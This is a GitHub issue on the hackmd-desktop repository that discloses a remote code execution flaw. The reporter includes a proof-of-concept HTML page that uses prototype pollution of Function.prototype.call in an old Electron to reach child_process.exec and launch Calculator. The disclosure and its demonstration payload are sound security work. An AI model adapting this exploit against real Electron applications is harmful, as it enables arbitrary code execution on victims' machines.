search

hackmdio / hackmd-desktop

:notebook: HackMD Desktop Application
305 stars 32 forks source link

hackmd desktop remote code execution #20

Closed imagemlt closed 5 years ago

imagemlt commented 5 years ago

hackmd desktop use an old version of electron, in which we can use prototype pollution to get node ability back in webviews without nodeintegration.

poc:

<a href="http://127.0.0.1/gg.html">click me</a>

here is source code of gg.html

<script>
Function.prototype.call2=Function.prototype.call;
Function.prototype.call=function(...args){
    if(args[0]!=null && args[0]!=undefined && args[0].env!=undefined){
        Function.prototype.call=Function.prototype.call2;
        args[0].mainModule.require('child_process').exec('open -a Calculator');
        }
        return this.call2(...args)
}
location.reload();
</script>

when click on it we can get a Calculator on mac.

image

suggestions:

imagemlt commented 5 years ago

any questions?

jackycute commented 5 years ago

Hi @imagemlt, Thanks for reporting this issue and giving us suggestion. We will investigate this soon.